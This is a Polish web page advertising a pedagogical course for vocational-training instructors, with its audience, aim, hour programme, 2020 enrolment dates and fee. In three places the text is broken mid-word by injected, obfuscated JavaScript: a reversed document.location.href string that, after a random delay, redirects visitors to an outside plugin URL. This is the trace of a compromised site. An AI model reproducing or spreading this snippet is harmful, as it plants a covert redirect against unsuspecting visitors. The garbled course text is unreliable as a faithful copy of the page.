Site Loader

Kurs Pedagogiczny dla Nauczycieli Praktycznej Nauki Zawodu

ADRESACI

Osoby pragnące uzyskać kwalifikacje pedagogiczne do praktycznej nauki zawodu. Kurs pedagogiczny dla nauczycieli praktycznej nauki zawodu przeznaczony jest dla osób posiadających  minimum średnie wykształcenie techniczne oraz maturę lub dyplom mistrza w zawodzie,  w którym zostanie zorganizowany proces kształcenia

CEL

– przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie nauczyciela (instruktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tora) praktycznej nauki zawodu  do planowania i organizowania pracy dydaktycznej i wychowawczej

Ramowy  program  kursu :

  • Podstawy wiedzy o nauczaniu i wychowaniu – 60 godz.
  • Metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todyka  nauczania – 90 godz.

Kurs realizowany na podstawie  programu MEN w wymiarze 150 godzin dydaktycznych.

TERMIN:

  • Nabór na nowy rok szkolny 2020/2021 do dnia 10.10.2020 r. Rozpoczęcie zajęć październiku 2020 r.
  • Liczba godzin – 150

KOSZT  –  900,-zł /os.